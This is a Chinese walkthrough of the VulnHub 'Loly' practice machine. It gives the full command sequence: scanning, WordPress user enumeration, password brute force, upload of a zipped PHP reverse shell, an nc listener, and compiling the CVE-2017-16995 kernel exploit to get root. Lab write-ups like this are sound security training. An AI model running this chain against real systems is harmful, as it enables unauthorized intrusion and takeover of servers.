vulnhub之Loly的實踐
今天實踐的是vulnhub的Loly鏡像,
下載地址,https://download.vulnhub.com/loly/Loly.ova,
用workstation導入,做地址掃描,sudo netdiscover -r 192.168.58.0/24,
176就是靶機,

繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.176,

有http服務,做一下目錄暴破,dirb http://192.168.58.176,

瀏覽器訪問http://192.168.58.176/wordpress,進一步點擊登錄,發現需要用域名,

本地添加上域名靜態記錄,192.168.58.176 loly.lc,再次訪問,需要用戶名密碼,

用kali攻擊機做用戶名掃描,
wpscan --url http://loly.lc/wordpress --enumerate u,發現用戶loly,

繼續用kali攻擊機做密碼暴破,
wpscan --url http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt,得到密碼,fernando,

用戶名密碼登錄,發現一處可以上傳文件的入口,提示不能直接上傳php文件,可以上傳zip,會自動解壓,

直接用kali攻擊機上自帶的web shell文件,
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php,
改一下反彈的地址和端口,再壓縮成zip,zip shell.zip shell.php,
從kali攻擊機的瀏覽器上傳,

kali攻擊機上開個反彈shell監聽,nc -lvp 4444,
瀏覽器訪問http://loly.lc/wordpress/wp-content/banners/shell.php,
獲取到反彈shell,不是root,需要提權,
查看系統信息,跟上期需要提權的情況一樣,

還是本地創建一個ubuntu16.04.1的虛機,
下載poc源碼,wget https://www.exploit-db.com/download/45010,
編譯,mv 45010 cve-2017-16995.c,gcc cve-2017-16995.c -o poc,
把編譯好的poc文件搞到靶機上,執行,chmod +x poc,./poc,
獲取到新的shell,id確認是root,
